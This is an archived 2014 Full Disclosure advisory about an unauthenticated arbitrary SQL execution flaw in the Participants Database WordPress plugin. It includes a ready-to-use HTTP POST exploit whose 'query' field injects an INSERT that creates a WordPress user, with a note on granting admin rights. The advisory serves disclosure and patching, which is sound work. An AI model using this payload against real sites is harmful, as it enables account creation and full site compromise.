| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 1 Jun 2014 13:25:53 +0700 From: Yarubo Security Research Team <research@...ubo.com> To: bugtraq@...urityfocus.com Cc: fulldisclosure@...lists.org, submissions@...ketstormsecurity.org Subject: [FD] Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress ========================================================================= Program: Participants Database <= 1.5.4.8 Severity: Unauthenticated attacker can fully compromise the Wordpress installation Permalink: http://www.yarubo.com/advisories/1 — Info — Participants Database is a popular Wordpress plugin that offers the functionality needed to build and maintain a database of people. As of today the plugin has been downloaded 92,089 times. — Vulnerability details — 1. Due to insufficient privilege checks it is possible for anonymous (unauthenticated) users to trigger some administrative actions If any of the shortcodes is used (e.g. signup page). 2. The action "export CSV" takes a parameter called "query" that can contain an arbitrary SQL query. This means that an unauthenticated user can execute arbitrary SQL statements (e.g. create an admin user, read or write files, or execute code depending on the MySQL user privileges). — Exploit — Add a user to wordpress as follows (if you want an admin user, also add admin privileges to wp_usermeta): POST /wordpress/pdb-signup/ HTTP/1.1 Host: www.example.com Content-Length: 789 (…) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN ------WebKitFormBoundaryuoACADe1C2IFWMxN Content-Disposition: form-data; name="action" output CSV ------WebKitFormBoundaryuoACADe1C2IFWMxN Content-Disposition: form-data; name="CSV_type" participant list ------WebKitFormBoundaryuoACADe1C2IFWMxN Content-Disposition: form-data; name="subsource" participants-database ------WebKitFormBoundaryuoACADe1C2IFWMxN Content-Disposition: form-data; name="query" INSERT INTO wp_users (ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name) VALUES (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f); ------WebKitFormBoundaryuoACADe1C2IFWMxN — Solution — This issue has been fixed in version 1.5.4.9. Download the newest version from: https://wordpress.org/plugins/participants-database/ — Credit — Yarubo Research Team research [at] yarubo.com Network Security Scan: http://www.yarubo.com/ Free Heartbleed Scan: http://www.yarubo.com/heartbleed _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists